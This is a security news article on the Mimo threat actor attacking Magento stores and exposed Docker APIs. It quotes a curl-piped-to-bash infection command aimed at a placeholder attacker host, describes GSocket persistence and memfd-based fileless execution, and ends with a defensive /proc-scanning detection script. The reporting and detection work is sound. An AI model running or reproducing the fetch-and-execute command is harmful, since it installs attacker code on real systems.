Threat Actor Mimo Attacking Magento CMS to Steal Card Details and Bandwidth Monetization

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

The cybersecurity landscape faces a new threat as the notorious Mimo threat actor, previously known for targeting Craft content management systems, has significantly evolved its operations to compromise Magento ecommerce platforms.

This expansion represents a dangerous shift toward high-value targets where financial data is routinely processed, marking a concerning escalation in the group’s criminal activities.

Mimo’s latest campaign demonstrates sophisticated technical capabilities, exploiting as-yet-undetermined PHP-FPM vulnerabilities to gain initial access to Magento installations.

The threat actor has developed a multi-pronged monetization strategy that combines traditional cryptocurrency mining with bandwidth theft through residential proxy networks.

This dual approach allows the attackers to extract maximum value from compromised systems while maintaining persistent access to valuable ecommerce environments.

DATADOG Security Labs researchers identified this evolution during investigations into multiple workload compromises affecting ecommerce sites throughout 2025.

The security team discovered that Mimo had not only expanded its target scope but had also introduced advanced persistence mechanisms and sophisticated evasion techniques that significantly enhance the threat’s operational security and longevity on compromised systems.

The threat actor’s operations extend beyond Magento platforms, with researchers uncovering evidence of Docker container compromises through misconfigured Docker Engine API endpoints.

Mimo Exploitation (Source – DATADOG Security Labs)

When targeting Docker environments, Mimo employs the command curl http://[adversary-controlled-infrastructure]/cron.jpg?docker | bash to initiate the infection chain, demonstrating the group’s adaptability across diverse infrastructure types.

Advanced Persistence and Evasion Mechanisms

Mimo’s most significant tactical advancement involves implementing GSocket, a legitimate penetration testing tool, for establishing persistent command and control channels.

This tool enables encrypted communication through the Global Socket Relay Network using AES-256-CBC encryption, effectively bypassing firewalls and network address translation barriers that would typically block malicious traffic.

The malware employs sophisticated process masquerading techniques, selecting random names from a hardcoded list including [kstrp], [watchdogd], [ksmd], and [kswapd0] to blend seamlessly with legitimate kernel processes.

Perhaps most concerning is Mimo’s implementation of the memfd_create() syscall, which creates anonymous temporary files directly in memory, allowing the malware to execute entirely without leaving traditional filesystem artifacts that security tools typically monitor.
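The two evasion techniques above (kernel-thread name masquerading and memfd_create() execution) both leave traces in /proc that a defender can check. The following is an added detection helper written for this article; it is not code from Datadog Security Labs or from the malware. It assumes a Linux host where real kernel threads have an empty /proc/<pid>/cmdline and no readable /proc/<pid>/exe link, and where the kernel renders memfd-backed executables as an exe link beginning with "/memfd:". The sample ProcInfo records used for checking are constructed.

```python
"""Detect userland processes masquerading as kernel threads and binaries
executed from anonymous memfd_create() files by inspecting /proc.

Assumptions (not from the article): standard Linux /proc layout, and the
"/memfd:<name> (deleted)" form of /proc/<pid>/exe for memfd-backed binaries.
"""
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Names the article reports Mimo choosing from; in production, build this
# set from a known-good host's real kernel threads rather than hardcoding it.
MASQUERADE_NAMES = {"kstrp", "watchdogd", "ksmd", "kswapd0"}


@dataclass
class ProcInfo:
    pid: int
    comm: str            # /proc/<pid>/comm (kernel threads have no brackets here; ps adds them)
    cmdline: bytes       # raw /proc/<pid>/cmdline, NUL-separated
    exe: Optional[str]   # readlink(/proc/<pid>/exe), or None if it cannot be read


def is_true_kernel_thread(p: ProcInfo) -> bool:
    # Genuine kernel threads expose no argv and no executable link.
    return p.cmdline == b"" and p.exe is None


def classify(p: ProcInfo) -> List[str]:
    """Return a list of finding tags for one process (empty if nothing suspicious)."""
    findings: List[str] = []
    name = p.comm.strip("[]")
    if name in MASQUERADE_NAMES and not is_true_kernel_thread(p):
        findings.append("kernel-thread-masquerade")
    if p.exe and p.exe.startswith("/memfd:"):
        findings.append("memfd-execution")
    # argv[0] wrapped in brackets is a common trick to look like a kernel thread in `ps`.
    argv0 = p.cmdline.split(b"\0", 1)[0]
    if re.fullmatch(rb"\[[^\]]+\]", argv0) and p.exe is not None:
        findings.append("bracketed-argv0")
    return findings


def read_proc(pid: int) -> Optional[ProcInfo]:
    """Collect the fields classify() needs for a live pid; None if it vanished."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/comm") as fh:
            comm = fh.read().strip()
        with open(f"{base}/cmdline", "rb") as fh:
            cmdline = fh.read()
    except OSError:
        return None
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:
        exe = None   # kernel thread (ENOENT) or insufficient privilege (EACCES)
    return ProcInfo(pid, comm, cmdline, exe)


def scan_host() -> Dict[int, Tuple[str, List[str]]]:
    """Walk /proc and return {pid: (comm, findings)} for flagged processes only."""
    results: Dict[int, Tuple[str, List[str]]] = {}
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            p = read_proc(int(entry))
            if p is not None:
                tags = classify(p)
                if tags:
                    results[p.pid] = (p.comm, tags)
    return results


if __name__ == "__main__":
    for pid, (comm, tags) in sorted(scan_host().items()):
        print(f"pid={pid} comm={comm} findings={','.join(tags)}")
```

Run the scan as root: without privileges the exe link of other users' processes is unreadable (EACCES), which makes a masquerading process with a cleared argv indistinguishable from a real kernel thread in this check. A second, cheaper corroboration is the parent pid: real kernel threads are children of kthreadd (pid 2).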
